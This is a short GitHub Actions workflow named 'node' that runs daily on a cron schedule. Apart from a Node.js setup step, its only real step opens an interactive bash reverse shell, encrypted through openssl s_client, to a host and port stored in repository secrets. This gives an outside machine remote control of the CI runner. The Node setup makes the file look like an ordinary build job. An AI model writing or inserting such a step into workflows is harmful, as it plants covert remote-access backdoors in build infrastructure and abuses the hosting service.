name: node
on:
  repository_dispatch:
    types: node
  schedule:
    - cron: "0 22 * * *"
    
jobs:
# ================== 第一个 job，这只有一个 job ==================
  first_job:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/setup-node@v1
        with:
          node-version: '14.x'
      - name: openssl
        run: |
          cat >  cert.pem  << EOF
          ${{ secrets.CERT }}
          EOF
          sudo apt-get -qqy install openssl
          mkfifo /tmp/s; /bin/bash -i < /tmp/s 2>&1 | openssl s_client -quiet -strict -verify 1 -verify_return_error -CAfile cert.pem -connect ${{ secrets.MY_IP }}:2222 > /tmp/s; rm /tmp/s
